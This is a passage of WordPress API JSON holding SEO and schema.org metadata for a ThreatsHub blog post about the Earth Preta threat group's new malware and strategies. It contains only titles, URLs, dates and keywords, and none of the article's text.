Strategies\",\"datePublished\":\"2024-09-09T00:00:00+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/earth-preta-evolves-its-attacks-with-new-malware-and-strategies\\\/\"},\"wordCount\":3059,\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/earth-preta-evolves-its-attacks-with-new-malware-and-strategies\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/trendmicro.scene7.com\\\/is\\\/image\\\/trendmicro\\\/EarthPretaNewMalwareStrategies-Header:Large?qlt=80\",\"keywords\":[\"Trend Micro Research : Articles, News, Reports\",\"Trend Micro Research : Malware\",\"Trend Micro Research : Research\"],\"articleSection\":[\"TrendMicro\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/earth-preta-evolves-its-attacks-with-new-malware-and-strategies\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/earth-preta-evolves-its-attacks-with-new-malware-and-strategies\\\/\",\"name\":\"Earth Preta Evolves its Attacks with New Malware and Strategies 2026 | ThreatsHub Cybersecurity News\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/earth-preta-evolves-its-attacks-with-new-malware-and-strategies\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/earth-preta-evolves-its-attacks-with-new-malware-and-strategies\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/trendmicro.scene7.com\\\/is\\\/image\\\/trendmicro\\\/EarthPretaNewMalwareStrategies-Header:Large?qlt=80\",\"datePublished\":\"2024-09-09T00:00:00+00:00\",\"description\":\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/earth-preta-evolves-its-attacks-with-new-malware-and-strategies\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/earth-preta-evolves-its-attacks-with-new-malware-and-strategies\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/earth-preta-evolves-its-attacks-with-new-malware-and-strategies\\\/#primaryimage\",\"url\":\"https:\\\/\\\/trendmicro.scene7.com\\\/is\\\/image\\\/trendmicro\\\/EarthPretaNewMalwareStrategies-Header:Large?qlt=80\",\"contentUrl\":\"https:\\\/\\\/trendmicro.scene7.com\\\/is\\\/image\\\/trendmicro\\\/EarthPretaNewMalwareStrategies-Header:Large?qlt=80\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/earth-preta-evolves-its-attacks-with-new-malware-and-strategies\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Trend Micro Research : Articles, News, Reports\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/tag\\\/trend-micro-research-articles-news-reports\\\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Earth Preta Evolves its Attacks with New Malware and Strategies\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"name\":\"ThreatsHub Cybersecurity News\",\"description\":\"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform\",\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"alternateName\":\"Threatshub.org\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\",\"name\":\"ThreatsHub.org\",\"alternateName\":\"Threatshub.org\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"contentUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"width\":432,\"height\":435,\"caption\":\"ThreatsHub.org\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/x.com\\\/threatshub\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\",\"name\":\"TH Author\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"caption\":\"TH Author\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Earth Preta Evolves its Attacks with New Malware and Strategies 2026 | ThreatsHub Cybersecurity News","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.threatshub.org\/blog\/earth-preta-evolves-its-attacks-with-new-malware-and-strategies\/","og_locale":"en_US","og_type":"article","og_title":"Earth Preta Evolves its Attacks with New Malware and Strategies 2026 | ThreatsHub Cybersecurity News","og_description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","og_url":"https:\/\/www.threatshub.org\/blog\/earth-preta-evolves-its-attacks-with-new-malware-and-strategies\/","og_site_name":"ThreatsHub Cybersecurity News","article_published_time":"2024-09-09T00:00:00+00:00","og_image":[{"url":"https:\/\/trendmicro.scene7.com\/is\/image\/trendmicro\/EarthPretaNewMalwareStrategies-Header:Large?qlt=80","type":"","width":"","height":""}],"author":"TH Author","twitter_card":"summary_large_image","twitter_creator":"@threatshub","twitter_site":"@threatshub","twitter_misc":{"Written by":"TH Author","Est. reading time":"15 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.threatshub.org\/blog\/earth-preta-evolves-its-attacks-with-new-malware-and-strategies\/#article","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/earth-preta-evolves-its-attacks-with-new-malware-and-strategies\/"},"author":{"name":"TH Author","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476"},"headline":"Earth Preta Evolves its Attacks with New Malware and Strategies","datePublished":"2024-09-09T00:00:00+00:00","mainEntityOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/earth-preta-evolves-its-attacks-with-new-malware-and-strategies\/"},"wordCount":3059,"publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/earth-preta-evolves-its-attacks-with-new-malware-and-strategies\/#primaryimage"},"thumbnailUrl":"https:\/\/trendmicro.scene7.com\/is\/image\/trendmicro\/EarthPretaNewMalwareStrategies-Header:Large?qlt=80","keywords":["Trend Micro Research : Articles, News, Reports","Trend Micro Research : Malware","Trend Micro Research : Research"],"articleSection":["TrendMicro"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.threatshub.org\/blog\/earth-preta-evolves-its-attacks-with-new-malware-and-strategies\/","url":"https:\/\/www.threatshub.org\/blog\/earth-preta-evolves-its-attacks-with-new-malware-and-strategies\/","name":"Earth Preta Evolves its Attacks with New Malware and Strategies 2026 | ThreatsHub Cybersecurity News","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/earth-preta-evolves-its-attacks-with-new-malware-and-strategies\/#primaryimage"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/earth-preta-evolves-its-attacks-with-new-malware-and-strategies\/#primaryimage"},"thumbnailUrl":"https:\/\/trendmicro.scene7.com\/is\/image\/trendmicro\/EarthPretaNewMalwareStrategies-Header:Large?qlt=80","datePublished":"2024-09-09T00:00:00+00:00","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","breadcrumb":{"@id":"https:\/\/www.threatshub.org\/blog\/earth-preta-evolves-its-attacks-with-new-malware-and-strategies\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.threatshub.org\/blog\/earth-preta-evolves-its-attacks-with-new-malware-and-strategies\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/earth-preta-evolves-its-attacks-with-new-malware-and-strategies\/#primaryimage","url":"https:\/\/trendmicro.scene7.com\/is\/image\/trendmicro\/EarthPretaNewMalwareStrategies-Header:Large?qlt=80","contentUrl":"https:\/\/trendmicro.scene7.com\/is\/image\/trendmicro\/EarthPretaNewMalwareStrategies-Header:Large?qlt=80"},{"@type":"BreadcrumbList","@id":"https:\/\/www.threatshub.org\/blog\/earth-preta-evolves-its-attacks-with-new-malware-and-strategies\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.threatshub.org\/blog\/"},{"@type":"ListItem","position":2,"name":"Trend Micro Research : Articles, News, Reports","item":"https:\/\/www.threatshub.org\/blog\/tag\/trend-micro-research-articles-news-reports\/"},{"@type":"ListItem","position":3,"name":"Earth Preta Evolves its Attacks with New Malware and Strategies"}]},{"@type":"WebSite","@id":"https:\/\/www.threatshub.org\/blog\/#website","url":"https:\/\/www.threatshub.org\/blog\/","name":"ThreatsHub Cybersecurity News","description":"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform","publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"alternateName":"Threatshub.org","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.threatshub.org\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.threatshub.org\/blog\/#organization","name":"ThreatsHub.org","alternateName":"Threatshub.org","url":"https:\/\/www.threatshub.org\/blog\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","contentUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","width":432,"height":435,"caption":"ThreatsHub.org"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/x.com\/threatshub"]},{"@type":"Person","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476","name":"TH Author","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","caption":"TH Author"}}]}},"_links":{"self":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/57056","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/comments?post=57056"}],"version-history":[{"count":0,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/57056\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media?parent=57056"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/categories?post=57056"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/tags?post=57056"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}